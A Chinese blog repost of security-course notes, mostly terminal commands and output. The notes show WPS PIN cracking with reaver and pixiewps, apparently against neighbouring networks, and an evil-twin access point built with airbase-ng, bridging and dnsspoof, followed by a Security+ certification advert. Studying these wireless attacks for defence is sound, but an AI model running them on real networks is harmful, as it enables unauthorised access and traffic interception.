安全牛学习笔记WPS及其他工具
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全牛学习笔记WPS及其他工具相关的知识,希望对你有一定的参考价值。
[email protected]:~# service network-manager stop
[email protected]:~# airmon-ng check kill
Killing these processes:
PID Name
765 dhclient
988 wpa_supplicant
先打上面的两个命令,把网卡映射到虚拟机,记住这个顺序
[email protected]:~# ifconfig //看不到网卡
[email protected]:~# ifconfig -a //必须运作ifconfig -a 才可以看到网卡
[email protected]:~# airmon-ng start wlan2
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1672 avahi-daemon
1673 avahi-daemon
PHY Interface Dirver Chipset
phy0 wlan2 ath9k_htc Atheros Communications, Inc . AR9271 802.11
(mac80211 monitor mode vif enbale for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disbale for [phy0]wlan2)
[email protected]:~# iwconfig
eth0 no wireless extensions.
wlan2mon IEE 802.11bgn Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
[email protected]:~# wash
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-D, --daemonize Daemonize wash
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-P, --output-piped Allows Wash output to be piped. Example. wash x|y|z...
-g, --get-chipset Pipes output and runs reaver alongside to get chipset
-h, --help Show help
Example:
wash -i mon0
[email protected]:~# wash -i wlan2mon
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
BSSID Channel RSSI WPS Version WPS Locked ESSID
------------------------------------------------------------------------------------------------
D0:C7:C0:99:ED:3A 1 00 1.0 No ziroom222
0C:82:68:5E:76:20 1 00 1.0 No letv
14:75:90:21:4F:56 6 00 1.0 No TP-LINK_4F56
5C:63:BF:F9:74:0C 6 00 1.0 No TP-DO3234
[email protected]:~# reaver -i wlan2mon -b D0:C7:C0:99:ED:3A -vv -K 1
[email protected]:~# reaver -i wlan2mon -b D0:C7:C0:99:ED:3A -vv //开始11000pin码尝试
[email protected]:~# pixiewps
Pixiewps 1.1 WPS pixie dust attack tool
Copyright (c) 2015, wiire <[email protected]>
Usage: pixiewps <arguments>
Required Arguments:
-e, --pke : Enrollee public key
-r, --pkr : Registrar public key
-s, --e-hash1 : Enrollee Hash1
-z, --e-hash2 : Enrollee Hash2
-a, --authkey : Authentication session key
Optional Arguments:
-n, --e-nonce : Enrollee nonce (mode 2,3,4)
-m, --r-nonce : Registrar nonce
-b, --e-bssid : Enrollee BSSID
-S, --dh-small : Small Diffie-Hellman keys (PKr not needed) [No]
-f, --force : Bruteforce the whole keyspace (mode 4) [No]
-v, --verbosity : Verbosity level 1-3, 1 is quietest [2]
-h, --help : Display this usage screen
Examples:
pixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce> -S
pixiewps -e <pke> -s <e-hash1> -z <e-hash2> -n <e-nonce> -m <r-nonce> -b <e-bssid> -S
[!] Not all required arguments have been supplied!
[email protected]:~# ixiewps -e <pke> -r <pkr> -s <e-hash1> -z <e-hash2> -a <authkey> -n <e-nonce>
[email protected]:~# reaver -i wlan2mon -b 00:90:4C:C1:AC:21 -vv -K 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Waiting for beacn from 00:90:4C:C1:AC:21
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.
[email protected]:~# reaver -i wlan2mon -b 00:90:4C:C1:AC:21 -vv -p 52737488 -c 1
Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212
[+] Switching wlan0mon to channel 1
[+] Switching wlan0mon to channel 2
^C
[+] Nothing done, nothing to save.
| EVIL TWIN AP / ROGUE AP 其他工具 |
| WPS (WIRELESS PROTECTED SETUP) 蹭网与被蹭网 北上广20%的公共场所无线网络是伪造的 |
WPS (WIRELESS PROTECTED SETUP) airbase-ng -a <AP mac> --essid "kifi" -c 11 wlan2mon apt-get install bridge-Utils 安装网桥 brctl addbr bridge brctl addif Wifi-Bridge eth0 brctl addif Wifi-Bridge at0 ifconfig eth0 0.0.0.0 up ifconfig at0 0.0.0.0 up ifconfig bridge 192.168.1.10 up route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1 |
[email protected]:~# airodump-ng wlan2mon
CH 1][ Elapsed: 3 mins ][ 2015-11-18 21:11
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:75:90:21:4F:56 -47 114 5 0 6 54e. WPA2 CCMP PSK TP-LINK_4F56
EC:26:CA:DC:29:B6 -32 190 0 0 11 54e. WPA2 TKIP MGT kifi
08:10:79:2A:29:7A -65 137 0 0 6 54e. WPA2 CCMP PSK 2-1-403
D0:C7:C0:99:ED:3A -69 94 8 0 1 54e WPA2 CCMP PSK ziroom222
E0:06:E6:39:C3:0C -76 90 0 0 6 54e. WPA2 CCMP PSK lizhi2012
5C:63:BF:F9:74:0C -79 99 0 0 6 54e. WPA2 CCMP PSK TP-D03234
BC:D1:77:C0:87:DE -86 56 0 0 11 54e WPA2 CCMP PSK MERCURY_C087DE
50:BD:5F:C0:F6:D6 -85 46 0 0 11 54e. WPA2 CCMP PSK MasterHuang
BC:14:EF:A1:97:29 -84 46 0 0 1 54e WPA2 CCMP PSK gehua01141406060486797
00:1E:58:OA:26:B2 -88 39 0 0 6 54e. WPA2 CCMP PSK dlink
EC:26:CA:3D:9C:ED -90 12 0 0 1 54e. WPA2 CCMP PSK YW170
80:89:17:15:86:28 -90 9 0 0 11 54e. WPA2 CCMP PSK TP-D03235
C8:3A:35:2A:D6:A8 -91 7 0 0 6 54e WPA2 CCMP PSK nayunhao
BSSID STATION PWR Rate Lost Frames Probe
14:75:90:21:4F:56 E8:3E:B6:1B:19:32 -64 0 -l1e 0 1
14:75:90:21:4F:56 90:3C:92:BA:00:CC -77 0G-11 0 7
14:75:90:21:4F:56 18:DC:56:F0:26:9F -84 0 -1 0 1
[email protected]:~# airbase-ng -c 11 --essid kifi-free wlan2mon //伪造wifi-free无线网络
21:12:36 Created tap interface at0
12:12:36 Trying to set MTU on at0 to 1500
12:12:36 Trying to set MTU on wlan2mon to 1800
21:12:37 Acess Point with BSSID 08:57:00:0C:96 started
[email protected]:~# ifconfig -a //出现了at0伪造网卡
[email protected]:~# airodump-ng wlan2mon //再侦听一下,出现了wifi-free无线网络
CH 1][ Elapsed: 3 mins ][ 2015-11-18 21:11
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1E:58:OA:26:B2 -88 39 0 0 6 54e. WPA2 CCMP PSK dlink
C8:3A:35:2A:D6:A8 -91 7 0 0 6 54e WPA2 CCMP PSK nayunhao
EC:26:CA:DC:29:B6 -32 190 0 0 11 54e OPN
EC:26:CA:DC:29:B6 -32 190 0 0 11 54e. WPA2 TKIP MGT kifi
14:75:90:21:4F:56 -47 114 5 0 6 54e. WPA2 CCMP PSK TP-LINK_4F56
08:10:79:2A:29:7A -65 137 0 0 6 54e. WPA2 CCMP PSK 2-1-403
D0:C7:C0:99:ED:3A -69 94 8 0 1 54e WPA2 CCMP PSK ziroom222
5C:63:BF:F9:74:0C -79 99 0 0 6 54e. WPA2 CCMP PSK TP-D03234
E0:06:E6:39:C3:0C -76 90 0 0 6 54e. WPA2 CCMP PSK lizhi2012
BC:14:EF:A1:97:29 -84 46 0 0 1 54e WPA2 CCMP PSK gehua01141406060486797
BC:D1:77:C0:87:DE -86 56 0 0 11 54e WPA2 CCMP PSK MERCURY_C087DE
50:BD:5F:C0:F6:D6 -85 46 0 0 11 54e. WPA2 CCMP PSK MasterHuang
EC:26:CA:3D:9C:ED -90 12 0 0 1 54e. WPA2 CCMP PSK YW170
BSSID STATION PWR Rate Lost Frames Probe
(not associated) 64:09:80:24:A2:C9 -93 0 - 1 0 3 leon
[email protected]:~# apt-get install bridge-Utils //安装网桥
[email protected]:~# brctl
Usage: brctl [commands]
commands:
addbr <bridge> add bridge
delbr <bridge> delete bridge
addif <bridge> <device> add interface to bridge
delif <bridge> <device> delete interface from bridge
hairpin <bridge> <port> {on|off} turn hairpin on/off
setageing <bridge> <time> set ageing time
setbridgeprio <bridge> <prio> set bridge priority
setfd <bridge> <time> set bridge forward delay
sethello <bridge> <time> set hello time
setmaxage <bridge> <time> set max message age
setpathcost <bridge> <port> <cost> set path cost
setportprio <bridge> <port> <prio> set port priority
show [ <bridge> ] show a list of bridges
showmacs <bridge> show a list of mac addrs
showstp <bridge> show bridge stp info
stp <bridge> {on|off} turn stp on/off
[email protected]:~# brctl addbr bridge
[email protected]:~# brctl addif bridge eth0
[email protected]:~# dhclient eth0
Job for smbd.service failed. See ‘systemctl status smbd.service‘ and ‘journalctl -xn‘ for details.
invoke-rc.d: initscript smbd, action "reload" failed.
[email protected]:~# brctl addif bridge eth0
[email protected]:~# brctl adddif bidge at0
[email protected]:~# ifconfig eth0 0.0.0.0 up
[email protected]:~# ifconfig at0 0.0.0.0 up
[email protected]:~# netstat -ar
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 bridge
[email protected]:~# route add -net 0.0.0.0 netmask 0.0.0.0 gw 10.1.1.1
[email protected]:~# netstat -ar
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 10.1.1.1 0.0.0.0 UG 0 0 0 bridge
10.0.0.0 10.1.1.1 255.0.0.0 U 0 0 0 bridge
WPS (WIRELESS PROTECTED SETUP) echo 1 > /proc/sys/net/ipv4/ip_forward dnspoof -i bridge -f dnsspoof.hosts /usr/share/dnsiff/dnsspoof.hosts apachet2ctl start |
[email protected]:~# vi /proc/sys/net/ipv4/ip_forward
不让修改数据!
[email protected]:~# echo 1 > /proc/sys/net/ipv4/ip_forward
把0改成1,就开启了路由功能!
[email protected]:~# cat /proc/sys/net/ipv4/ip_forward
1
[email protected]:~# dnspoof -i bridge -f dnsspoof.hosts
[email protected]:~# cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
[email protected]:~# cat /usr/share/dnsiff/dnsspoof.hosts
[email protected]:~# vi host
[email protected]:~# dnsspoof -i bridge -f host
dnsspoof: listening on bridge [udp dst port 53 and not src 10.1.1.101]
[email protected]:~# apache
apache2 apache2ctl apachectl apache-users
[email protected]:~# apachet2ctl start
AH00558: apache2: Coule not reliably determine the Server‘s fully qualified domain name, using 127.0.1.l.Set the ‘ServerName‘ directive globally to suppress this message
[email protected]:~# netstat -pantu | grep :80
tcp6 0 0 :::80 :::* LISTEN 2941/apache2
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
本文出自 “11662938” 博客,请务必保留此出处http://11672938.blog.51cto.com/11662938/1967657
以上是关于安全牛学习笔记WPS及其他工具的主要内容,如果未能解决你的问题,请参考以下文章